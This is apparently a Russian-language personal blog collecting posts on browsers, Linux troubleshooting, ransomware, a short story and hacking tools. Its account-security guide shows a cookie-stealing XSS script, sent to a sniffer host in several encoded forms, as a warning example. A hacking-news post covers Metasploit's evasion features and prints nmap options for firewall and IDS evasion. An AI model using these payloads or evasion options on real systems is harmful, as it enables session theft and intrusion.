Браузер Opera 10.50 Final

Финальная версия "Самого быстрого браузера на земле" - по уверениям разработчиков.

Короче, самый быстрый - это Хром. Но Опера самая быстрая тожИ. Сафари тожИ очень быстр. Так шо самых быстрых браузеров весьма предостаточно. Используйте которые вам больше нравятся. Тока ненада орать шо ани самыи быстрыи... все они быстрые. И хорошие. Каждый по своему. У кого отклоючены автообновления Оперы. Качайте тут (официальная версия - русский язык)

(мультиязычная оф версия программы)

Для мобилок:

чтобы установить браузер на мобилку с вашего мобильного телефона перейдите по адресу m.opera.com с помощью стандартного браузера своего телефона.

Чтобы загрузить браузер на комп и после слить на мобилу выберите тут модель вашего телефона

Базовая, или стандартная версия для любых телефонов тут.

«time bomb» - Конец Windows 7even RC


Из рассылки TechNet
Завершение срока работы Windows 7 Release Candidate


Напоминаем, что срок действия Windows Release Candidate подходит к
концу. 1 марта во всех версиях RC будет активирована «time bomb»,
перезагружающая систему каждые 2 часа. Благодарим всех участников
программы тестирования новой операционной системы и рекомендуем
озаботиться сохранением своих данных и переходом на полноценную версию
Windows 7.

Microsoft 1 Microsoft Way Redmond, Washington, USA ©

Ветер Прибужья

Феньки-лисички, ставшие символом и названием нового мобильного браузера от файрфокс Fennec, кафрские (рогатые) вороны и грифовые цесарки - новое достоинство Николаевского зоопарка.Птицы, ставшие новыми питомцами зоопарка,кроме Николаевского, есть только в пяти городах СНГ. Это относится к грифовой цесарке. Рогатые вороны имеются пока лишь в четырех зоопарках постсоветского пространства.

В декабре Николевский зоопарк обменялся животными с другими зоопарками, благодаря чему разжился новыми лисичками и птицами. К сожалению посмотреть животных никак нельзя, потому что они находятся на карантине. Пока лишь могу предоставить фотки с Wikipedia.

Фенек (Vulpes zerda) — миниатюрная лисица своеобразной внешности, которая живёт в пустынях Северной Африки. Иногда её относят к особому роду Fennecus.

Fennec— название веб-браузера Mozilla Firefox, адаптированного для мобильных телефонов, смартфонов и других мобильных устройств. Имя браузера происходит от лисы фенек — миниатюрной пустынной лисицы.

Кафрский рогатый ворон (Bucorvus leadbeateri (Vigors, 1825)) — самый крупный вид из семейства птиц-носорогов, один из двух видов, входящих в род рогатых воронов. Обитает в африканской саванне, к югу от экватора.

Грифовая цесарка (Acryllium vulturinum)- семейство птиц из отряда курообразных, обитающих в Африке и на Мадагаскаре

Вымогатели.

Уже многие сталкивались, или хотя бы наслышаны о троянах, блокирующих компьютеры с требованием отправить платную sms для его разблокировки. Сегодня случайно интересную инфу в домашних сетях Донецка.

"Лаборатория Касперского" представила бесплатный сервис для борьбы с программами-вымогателями класса Trojan-Ransom, блокирующими компьютер и предлагающими отправить платную СМС на определенный номер. Отличие вредоносных программ класса Trojan-Ransom от других вредоносных приложений заключается в их изначальной коммерческой направленности. Каждая программа этого поведения является инструментом для получения денег киберпреступников. Используя новый сервис, нужно указать номер телефона, на который предлагают отправить СМС, а также текст сообщения, которое требуют отправить на этот номер. Взамен на номер отправителя будет выслан код, позволяющий разблокировать компьютер."

Статья на КасперЛаб.

Mandriva или Windows? Интернет.

Последнее время происходят частые разъединения сетевых соединений peopleNET в Николаеве. Это связано с работами проводимыми провайдером в нашем городе...


Модем вылетает,  его "типа - теряет" Windows. Что удивило, так это работа модема под Mandriva Linux PP 2009. Модем вылетает, но восстанавливается соединение намного проще, запросто можно работь в много-вкладочном режиме.)
Плюс клиент icq. Windows теряет модем при запуске почтового клиента, (который в придачу ко всему висит в автозапуске в linux) браузера с более чем пятью вкладками, и  qip... а тут тоже, плюс i.ua - попытки входа на который под "вендой" - заканчиваются полным провалом.
Так, что "сексуальная", как её называют французы(и по моему не зря) мандрива порадовала снова.


Кстати cooliris - великолепно работает на 2009-ой при выборе отказа от установки adobeflash. То же самое относится и к работе foxtab. При первом запуске браузера с момента установки расшмрения, он спрашивает воспользоваться старой версией или установить adobeflash. Я выбираю старую версию Foxtab. И работае отлично.


Про шрифты - уж и не знаю... с "родными" mandriva font - мне нравится. Отлично смотрится!)

Mandriva завораживает эффектами Linux. Распадающиеся на куски при закрытии окна, колыхающиеся при перемещении и становящиеся при этом полупрозрачными... после скупой на эффекты и пожирающей ресурсы немеряно "венды" - mandriva может показаться раем.) Кубы рабочих столов, запускаю как заставку. Пр удерживании стрелки он начинается вращаться в сторону указателя стрелки.)


Крайне красивая и удобная вещь! Рабочие столы. В мандрива линукс - удобное для навигации меню и программ-стартер. Прикольно смотрятся эффекты минимизации окон. Когда сворачиваемое окно  уменьшаясь - исчезает в панели задач.)
Короче - классная и стильная система. И в трудный час, как оказалось не подводит.

Picasa for Linux x86_64

Приложение устанавливается но на данной архитектуре неверно отображаются русскоязычные имена папок и файлов, а также меню.



Если выставить в настройках русский - то часть меню отображается нормально, а например диалоговое окно настроек - не нормально.


Короче - полный попандос. Причём это касается только указанной архитектуры процессора. На i586 - всё становится как надо. Попытка добавить репозиторий гугла тоже закончилаьс провалом.
_______________________
# urpmi.addmedia -v google64 http://dl.google.com/linux/rpm/stable/x86_64 with hdlist.cz
getting exclusive lock on urpmi
добавляется источник "google64"
...извлечение не удалось: сбой wget: завершён с 1

no metadata found for medium "google64"
unlocking urpmi database
_______________________
В отношении установки версии 3 - главная проблема в
lsb-core-ia32 >= 3.0 нужен для picasa-3.0.5744-02.i386
Установить обычно не удалось, просто выхожу в приглашение снова.
# urpmi -y lsb-core
#
Пакеты lsb-core-3.1-16mdv2009.0.x86_64, lsb-core-3.1-16mdv2009.0.x86_64, lsb-core-3.1-16mdv2009.0.x86_64 уже установлен
Интересно возможно ли заменить lsb-core-3.1-16mdv2009.0.x86_64 на lsb-core-3.1-16mdv2009.0.i386(586) без пагубных последствий для системы?
Поскольку единственное, что сделал - это выставил аглицкий в интерфейсе. С меню и диалогами стало проще. Но папки и файлы - по прежнему в квадратиках...


Редактировано 19:55 10.12.2009 Источник добавляется так


времени проверить установку с параметром замены существующих пакетов принудительно не было. Простое urpmi picasa - выдало ошибку - пакет установлен. ....

21:03 10.12.2009 - наконец-то поробовал загрузить с параметром --replacepkgs. Загружается, но с источника имеющего версию i386... а мне это не нужно...
[root@localhost vendetta]# urpmi picasa --replacepkgs

    http://dl.google.com/linux/rpm/stable/i386/picasa-2.7.3736-15.i386.rpm
        13% из 24791434 завершено, осталось времени = 2m 19s, скорость = 180K/s

# urpmi picasa --replacepkgs

    http://dl.google.com/linux/rpm/stable/i386/picasa-2.7.3736-15.i386.rpm
предупреждение: /var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: Заголовок V3DSA signature: NOKEY, key ID 7fac5991
Следующий пакет имеет неверную подпись:
/var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: Неверная подпись (NOT OK (nokey): /var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: °» V3 DSA signature: NOKEY, key ID 7fac5991)
Продолжить установку? (y/N) Y
устанавливается picasa-2.7.3736-15.i386.rpm из /var/cache/urpmi/rpms
Подготовка...                    #############################################
      1/1: picasa                #############################################
по прежнему предупреждает о неверной подписи...

21:10 - Удаление источника http://dl.google.com/linux/rpm/stable/i386 - приводит к тому, что пакет не находится...


Защити свой аккаунт.

Вам понравится, если украдут вашу почту, почтовый ящик, а заодно и ник регистрации в блоге? Уверен, что нет. Не все возможности защиты зависят от настроек сервера, и администраторов сайта, программистов.
К сожалению устройство блогов таково, что такая возможность как похищение пароля остаётся у взломщика. И поскольку не всё зависит от админов, то давайте посмотрим на то, что же можем и должны делать мы сами?
Мы можем зайти в настройки почтового ящика и оставить там сообщение:
"Не влезай - убьёт!", или:
"Стыришь мой пароль получишь в рожу!" lol podmig
Ну, а теперь вполне серьёзно!

Что нужно для того чтобы не угнали ваш аккаунт?
Общие правила безопасности.
1.    Хороший, стойкий пароль, который не содержит символов из ваших имени и даты рождения. Особенно если они указаны на сайте, в анкете знакомств, при регистрации и т.п. Не используйте простые пароли, короче семи-шести символов.
"Дело в том, что мало кто выбирает себе пароль, как бессмысленный набор символов. По-этому при рассчетном
количестве вариантов (например 20 миллиардов) пользователями реально используются несколько сотен тысяч наиболее популярных паролей. Даже для дохлого компа перебор такого количества паролей - плевое дело. Есть еще так называемый "силовой метод". Это когда большое количество
вариантов перебирается несколькими мощными компами. Метод легко
масштабируется. Здесь вопрос подбора - лишь вопрос времени и наличия
вычислительных мощностей у взломщика. Но чтобы ускорить такую рутинную работу, для этого можно использовать
вирусы, если заразить, или подчинить(бот сети) большое количество компов, то все они будут
подбирать пароли."

2.    Секретный вопрос для восстановления пароля должен тоже быть совершенно неожиданным. Точнее ответ на него. На пример, если вопрос выглядит так – Какая у Вас была кличка в школе?
Ответ можете сделать примерно таким - 1+1=44. А если - какая девичья фамилия Вашей матери – напишите - Кальмары в соусе.
3.    Пользуйтесь безопасными браузерами. Я предпочитаю Mozilla Firefox…
Правила безопасности в блоге и почте.
4.    Если вы открыли пришедшее вам письмо, перешли по ссылке в нём, которая якобы указывает на сайт i.ua (в контексте этого сайта), но при этом попадаете на якобы главную страницу сайта, где снова нужно авторизироваться, помните, что вы Уже авторизированны на сайте, иначе не вошли бы в свою почту. Поэтому не стоит вводить повторно свои пароль и ник. Достаточно просто обновить страницу. Если вы, находясь на сайте, в почтовом ящике, то есть уже выполнили вход на сайт,  при открытии новой страницы сайта получаете предложение ввести свои пароль и ник снова, ни в коем случае не делайте этого! Достаточно просто обновить страницу, хотя, для интереса вы можете, ввести свой ник, а пароль ввести Ложный. В том случае, если это поддельная страница вас может перенести на главную страницу сайта (а может и нет),  в таком случае ваш поддельный пароль будет просто принят без вывода сообщения об ошибке, если же это настоящая страница (что в принципе не возможно, коль вы уже вошли) то вы получите сообщение об ошибке ->


Если вас перевело на главную попробуйте обновить страницу или просто закрыть вкладку. При обновлении страницы, если на другой вкладке вы уже вошли, вход будет произведён автоматически.
5.    Ссылки. Будьте внимательны при прочтении писем, которые содержат ссылки. Если есть реальная необходимость перейти по ссылке которую прислали в письме, лучше скопируйте её и вставьте в новой вкладке браузера, или новом окне. Будьте внимательны обращайте внимание на то куда ведут ссылки. Смотрите по символам из которых состоит адрес ссылки. Дважды подумайте так ли для Вас важно проследовать по ссылке вида ужасного для вас совсем не понятного, типа:
%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61%6E%65%74%79%2D%68%61%63%6B%65%72%61%6D%2E%72%75%2F%73%6E%69%66%66%2F%73%2E%67%69%66%3F%69%64%3D%32%31%32%38%26%22%2B%
64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

или
<script>img=new Imag&#x65
;()&#x3B; img.src="http://&#x7
0;lanety-hackeram.ru/s&#x
6E;iff/s.gif?id=2128&"+document.cookie&#x3B;</script>&#60&#115&#99&#114&#105&#112&#116&#62&#105&#109&#103&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#109&#103&#46&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#112&#108&#97&#110&#101&#116&#121&#45&#104&#97&#99&#107&#101&#

114&#97&#109&#46&#114&#117&#47&#115&#110&#105&#102&#102&#47&#115&#46&#103&#105&#102&#63&#105&#100&#61&#50&#49&#50&#56&#38&#34
&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#60&#47&#115&#99&#114&#105&#112&#116&#62
или
PHNjcmlwdD5pbWc9bmV3IEltYWdlKCk7IGltZy5zcmM9Imh0dHA6Ly9wbGFuZXR5LWhhY2tlcmFt LnJ1L3NuaWZmL3MuZ2lmP2lkPTIxMjgmIitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+
(хотя эти методы чаще используются для обхода мер безопасности системы, обхода фильтров установленных администрацией, но в качестве примера - сгодится), а в почте же чаще могут попасться ссылки типа
http: g.i.ua?_url="http%3A%2F%2Fplanety-hackeram.ru%2Fsniff%2Fs.gif%3Fid%3D2128
Ведь так можно замаскировать ссылку, куда она ведёт, да и не только ссылку... то есть помните, что ссылки могут быть замаскированными и для перехода по ним из почты лучше копировать их и вставлять в адресную строку браузера на новой вкладке\окне...
Ну, да не будем отвлекаться. Что же нам понадобится ещё? Кроме нашего внимания и осторожности, хорошего пароля и немного ума?
6. Не игнорируйте сообщения своего браузера! Если он предупреждает вас о том, что вы собираетесь перейти на небезопасную страницу\сайт, не стоит убеждать себя, что это же i.ua! Что тут не может быть опасности... браузер как раз собирался вам сказать, что это вовсе не тот сайт о котором вы думали, что это подделка!
7. Не сообщайте никому свой пароль для входа в почту или на сайт. Если же вы по какой-то (надеюсь - действительно серьёзной) причине сделали это, смените пароль при первой возможности.
Я думаю, вобще то всё... и надеюсь, что меня возможно кто-то исправит, или дополнит. Со временем, когда оно появится я возможно дополню эту статью некоторыми нюансами, но в целом - всё.
А ссылки на программы для качественного управления паролями:
Генерация паролей, хранение паролей - будут попозже в сообществе 911.
Всего доброго, удачи.
P.S. Статья написана в контексте данного сайта, то есть специально для пользователей i.ua. Безусловно не всех.podmig

Неожиданная гостья.

Ну, как всегда сижу под арестом у компьютера. Так как все мои друзья уже знают, что живу у бабульки, немного опишу как это выглядит. Коридор, затем бабушкина комната, затем детская, где сейчас и стоит мой компьютер, напротив окна. Дальше зал и спальня, но дальше уже не важно. Так, вот сижу вперившись взглядом в монитор, качаю очередной мануал... все двери открыты.
Теплынь. Сирень зацвела. Сегодня скину подруге фотки... (пока не сделал, Мотильда! Прости!)
Краем глаза замечаю какое-то движение у дверей в коридор. Дома кошки, собака, потому не обращая внимания, работаю себе дальше. И чувствую мягкое приземление на голову. Судя по весу не комар и даже не моль. Стряхиваю рукой,- аккуратно! - в последний момент до прикосновения крикнул внутренний голос... на клавиатуру падает к моему удивлению большой махаон. Летняя бабочка. Прилетела проведать, меня развеять мои умственные настроения.
Махаон окинув клавиатуру беглым взглядом неуклюже движется в сторону клавиши W\Ц, которую мне Соня вырвала когтём когда от Оскар бежала, и Оскар (гад!) её погрыз. Я клавишу поставил вместо скролл-лок, ну, а эту на место скролла всунул. Так вот, "подходит" Махаон значит, к этой самой злополучной клавише, и говорит:- А это, чё?Как чё, говорю - клавиша. Он на неё вмостился, крылами помахал:
- Неее, говорит - не пойдёт! Не стартану отсюда. Ещё крыло не окрепло совсем.Я говорю:- Да это кошка мне с собакой поломали... *smutili*Он(Махаон):- Вот казлы!Тут Соня из-за монитора, нос свой показала и стала наблюдать. Ну бабочка ещё немного погуляла, по столу, на руку мне забралась и заглянула в монитор.
Всё так внимательно там рассмотрела Печально покачала головой.
Проверил, Махаон, что я читаю...
Молвил:- Мдя! Я полетел!
В нос чмокнул Соньку и на занавеску приземлился...
Ну, я ему:Куда же ты мой друг? Решётка. Да и вобще тут - камера, блин, одиночка... лети-ка ты на двор. И вынес, на яблони цветок соседской, его я усадил. 
Пускай летит. Ведь там его свобода. Меня же ждёт моя "тюрьма". Пошёл читать я дальше.

Новости в мире Хак софта. Всё в одном.

Весь "боекомплект" для хакера. Начинающего и самого продвинутого. Обновилась всемирно известная программа Metasploit Framework от не менее известного автора H.D. Moore.
Metasploit Framework 3.2 release

Exploits      =320
Payloads    =217
Encoders    = 20
Nops           = 6
Auxiliary     =99
Nmap + GUI - Zenmap в комплекте. Используй пока не использовали против тебя! Теперь тут не только консоль и web интерфейс встроенный в браузер, но также собственный интерфейс программы. В комплекте поставки и не менее популярный сканер пришедший из мира *nix систем - nmap. Возможности nmap и Metasploit - давно известны. Программы пригодятся как системному администратору, для проверки сети, сайта, серверов, или локальной системы,


так и взломщику. Программы используются по обе стороны баррикады. В этом вся прелесть подобного софта.))) Или его недостаток? Но мы не можем сделать это недостатком программы, так, как это скорее недостаток людей которые используют совсем не в тех целях для которых она предназначена. Framework - это платформа для создания программ позволяющих эксплуатировать
наиболее распространенные ошибки в локальных и сетевых приложениях. Framework
используется профессионалами в области защиты информации. Позволяет исследовать
уязвимости, имеет набор стандартных шеллкодов. На данный момент, пакет
Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Помимо добавления собственного интерфейса, кроме старого, встраиваемого в браузер,

новым является следующее:
    Улучшенное шифрование шеллкода. Обнаружить атаку теперь станет еще труднее.
    Улучшения в функции Raw Packet Tools, облегчающие внедрение вредоносного кода.
    Новая библиотека PacketFu, позволяющая осуществлять внедрение пакетов как в обычных, так и в беспроводных сетях.
    Улучшенная поддержка взлома машин с многоядерными процессорами.
    Улучшенная поддержка маскировки эксплоита в .exe-файле, позволяющая обходить сигнатурную проверку антивирусов.
    Новая система автоматической атаки на стороне клиента Browser Autopwn, автоматически запускающая эксплоиты против браузера пользователя.
    Новый модуль для подготовки атак с участием жертвы Metasploit in the Middle Feature, который можно будет использовать для спуфинга DNS или создания фальшивой точки доступа.
    Новая функция Evil Wireless Access Point.
По словам создателя программы и в то же самое время, автора - опубликованного для iPhone шелл-кода - H.D. Moore, при помощи функции Evil Wireless Access Point можно будет создать точку доступа, которая нивелирует все
другие точки доступа в пределах ее досягаемости и сможет мимикрировать под
точку доступа пользователя по умолчанию. Сплошные превращения! И новые функции Browser AutoPwn, Metasploit in the Middle и Evil
Wireless Access Point, кроме всего прочего увеличивают вероятность незаметного проникновения, обход антивирусных программ осуществляющих сигнатурный анализ, и атаку браузера на стороне клиента. Для тех, кто не знаком с программой в сети есть масса описаний и на секлабе и античате, даже видео есть на античате.
В комплекте под windows -
Zenmap, сетевой сканер - поставляется в версии 4.76.


Возможности программы известны давным-давно и на полную используются не только системными администраторами, но и хакерами. В принципе, как инструмент - программа очень хороша, имеет массу возможностей, о которых можно почитать на сайте производителя. GUI облегчает использование сканера новичками в системном администрировании, и поиске уязвимостей в сетях и локальных системах.
Использование параметров: nmap [Тип(ы) Сканирования] [Опции] {цель сканирования}

Несколько стандартных опций:
ОПРЕДЕЛЕНИЕ ЦЕЛИ СКАНИРОВАНИЯ:
  Можно использовать сетевые имена, IP адреса, сети и т.д.
  Пример: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <имя_входного_файла>: Использовать список хостов/сетей из файла
  -iR <количество_хостов>: Выбрать произвольные цели
  --exclude <хост1[,хост2][,хост3],...>: Исключить хосты/сети
  --excludefile <имя_файла>: Исключить список из файла
ОБНАРУЖЕНИЕ ХОСТОВ:
  -sL: Сканирование с целью составления списка - просто составить список целей для сканирования
  -sP: Пинг сканирование - просто определить, работает ли хост
  -PN: Расценивать все хосты как работающие -- пропустить обнаружение хостов
  -PS/PA/PU [список_портов]: TCP SYN/ACK или UDP пингование заданных хостов
  -PE/PP/PM: Пингование с использованием ICMP эхо запросов, запросов временной метки и сетевой маски
  -PO [список_протоколов]: Пингование с использованием IP протокола
  -n/-R: Никогда не производить DNS разрешение/Всегда производить разрешение [по умолчанию: иногда]
  --dns-servers <сервер1[,сервер2],...>: Задать собственные DNS сервера
  --system-dns: Использовать системный DNS преобразователь
РАЗЛИЧНЫЕ ПРИЕМЫ СКАНИРОВАНИЯ:
  -sS/sT/sA/sW/sM: TCP SYN/с использованием системного вызова Connect()/ACK/Window/Maimon сканирования
  -sU: UDP сканирование
  -sN/sF/sX: TCP Null, FIN и Xmas сканирования
  --scanflags <флаги>: Задать собственные TCP флаги
  -sI <зомби_хост[:порт]>: "Ленивое" (Idle) сканирование
  -sO: Сканирование IP протокола
  -b <FTP_хост>: FTP bounce сканирование
  --traceroute: Отслеживать путь к хосту
  --reason: Выводить причину нахождения порта в определенном состоянии
ОПРЕДЕЛЕНИЕ ПОРТОВ И ПОРЯДКА СКАНИРОВАНИЯ:
  -p <диапазон_портов>: Сканирование только определенных портов
    Пример: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  -F: Быстрое сканирование - Сканирование ограниченного количества портов
  -r: Сканировать порты последовательно - не использовать случайный порядок портов
  --top-ports <количество_портов>: Сканировать <количество_портов> наиболее распространенных портов
  --port-ratio <рейтинг>: Сканировать порты с рейтингом большим чем <рейтинг>
ОПРЕДЕЛЕНИЕ СЛУЖБ И ИХ ВЕРСИЙ:
  -sV: Исследовать открытые порты для определения информации о службе/версии
  --version-intensity <уровень>: Устанавливать от 0 (легкое) до 9 (пробовать все запросы)
  --version-light: Ограничиться наиболее легкими запросами (интенсивность 2)
  --version-all: Использовать каждый единичный запрос (интенсивность 9)
  --version-trace: Выводить подробную информацию о процессе сканирования (для отладки)
СКАНИРОВАНИЕ С ИПОЛЬЗОВАНИЕМ СКРИПТОВ:
  -sC: эквивалентно опции --script=default
  --script=<Lua скрипты>: <Lua скрипты> это разделенный запятыми список директорий, файлов скриптов или
  категорий скриптов
  --script-args=<имя1=значение1,[имя2=значение2,...]>: Передача аргументов скриптам
  --script-trace: Выводить все полученные и отправленные данные
  --script-updatedb: Обновить базу данных скриптов
ОПРЕДЕЛЕНИЕ ОС:
  -O: Активировать функцию определения ОС
  --osscan-limit: Использовать функцию определения ОС только для "перспективных" хостов
  --osscan-guess: Угадать результаты определения ОС
ОПЦИИ УПРАВЛЕНИЯ ВРЕМЕНЕМ И ПРОИЗВОДИТЕЛЬНОСТЬЮ:
  Опции, принимающие аргумент <время>, задаются в миллисекундах, пока вы не добавите 's' (секунды), 'm' (минуты),
  или 'h' (часы) к значению (напр. 30m).
  -T[0-5]: Установить шаблон настроек управления временем (больше - быстрее)
  --min-hostgroup/max-hostgroup <кол_хостов>: Установить размер групп для параллельного сканирования
  --min-parallelism/max-parallelism <кол_хостов>: Регулирует распараллеливание запросов
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <время>: Регулирует время ожидания ответа на запрос
  --max-retries <количество_попыток>: Задает максимальное количество повторных передач запроса
  --host-timeout <время>: Прекращает сканирование медленных целей
  --scan-delay/--max-scan-delay <время>: Регулирует задержку между запросами
  --min-rate <число>: Посылать запросы с интенсивностью не меньше чем <число> в секунду
  --max-rate <число>: Посылать запросы с интенсивностью не больше чем <число> в секунду
ОБХОД БРАНДМАУЭРОВ/IDS:
  -f; --mtu <значение>: Фрагментировать пакеты (опционально с заданным значениме MTU)
  -D <фикт_хост1,фикт_хост2[,ME],...>: Маскировка сканирования с помощью фиктивных хостов
  -S <IP_адрес>: Изменить исходный адрес
  -e <интерфейс>: Использовать конкретный интерфейс
  -g/--source-port <номер_порта>: Использовать заданный номер порта
  --data-length <число>: Добавить произвольные данные к посылаемым пакетам
  --ip-options <опции>: Посылать пакет с заданным ip опциями
  --ttl <значение>: Установить IP поле time-to-live (время жизни)
  --spoof-mac <MAC_адрес/префикс/название производителя>: Задать собственный MAC адрес
  --badsum: Посылать пакеты с фиктивными TCP/UDP контрольными суммами
ВЫВОД РЕЗУЛЬТАТОВ:
  -oN/-oX/-oS/-oG <файл>: Выводить результаты нормального, XML, s|<rIpt kIddi3,
     и Grepable формата вывода, соответственно, в заданный файл
  -oA <базовове_имя_файла>: Использовать сразу три основных формата вывода
  -v: Увеличить уровень вербальности (задать дважды или более для увеличения эффекта)
  -d[уровень]: Увеличить или установить уровень отладки (до 9)
  --open: Показывать только открытые (или возможно открытые) порты
  --packet-trace: Отслеживание принятых и переданных пакетов
  --iflist: Вывести список интерфейсов и роутеров (для отладки)
  --log-errors: Записывать ошибки/предупреждения в выходной файл нормального режима
  --append-output: Добавлять в конец, а не перезаписывать выходные файлы
  --resume <имя_файла>: Продолжить прерванное сканирование
  --stylesheet <путь/URL>: Устанавливает XSL таблицу стилей для преобразования XML вывода в HTML
  --webxml: Загружает таблицу стилей с Nmap.Org
  --no-stylesheet: Убрать объявление XSL таблицы стилей из XML
РАЗЛИЧНЫЕ ОПЦИИ:
  -6: Включить IPv6 сканирование
  -A: Активировать функции определения ОС и версии, сканирование с использованием скриптов и трассировку
  --datadir <имя_директории>: Определяет место расположения файлов Nmap
  --send-eth/--send-ip: Использовать сырой уровень ethernet/IP
  --privileged: Подразумевать, что у пользователя есть все привилегии
  --unprivileged: Подразумевать, что у пользователя нет привилегий для использования сырых сокетов
  -V: Вывести номер версии
  -h: Вывести эту страницу помощи
ПРИМЕРЫ:
  nmap -v -A scanme.nmap.org
  nmap -v -sP 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -PN -p 80
Наиболее эффективные результаты достигаются в сканировании с использованием скриптов.
Скачать
SpyLOG

Opera... парочка секретов популярного браузера.

Не знаю у кого как, а вот у меня неоднократно возникала такая проблема. Нажимаеш в Опере ссылку скачать и если файл типа .rar - то он просто загружается в окно Opera. И в окне отображаются кракозябры. Оно то и понятно это ведь архив... всё дело в том, что нужно в таких случаях задать опере парочку указаний для обработки файловых архивов типа .rar. Для этого:

Заходите в Инструменты->Настройки, или жмёте Ctrl+F12-> Дополнительно-> Загрузки.

В поле  поиска вводите “rar” и снимаете галочку с “Не показывать типы файлов Opera“. В результате вы увидите несколько уже имеющихся в вашем браузере MIME-типов для расширения .rar. Следуя нижеуказанным списком, необходимо добавить недостающие MIME-типы. Для каждого из них в поле “Расширения файлов” необходимо поставить “rar” (без кавычек). MIME-типы: application/octet-stream application/rar application/x-compress application/x-compressed application/x-rar application/x-rar-compressed multipart/x-rar Готово! Дерзайте. А я, поскольку использую пока Альфа версию браузера Opera - Opera Turbo 10.0.1355 Alpha Могу воспользоваться новой фишкой, которая добавлена в версии 10. помимо стандартного увеличения скорости всё же ЕЩЁ увеличить скорость загрузки,  Также Инструменты->Настройки, или - ctrl+F12 -> вкладка web pages -> поставить галочку Enable Opera Turbo... Opera Turbo 1355 EN официальнОй сайт... Как руссифицировать ужО писалосЯ.
SpyLOG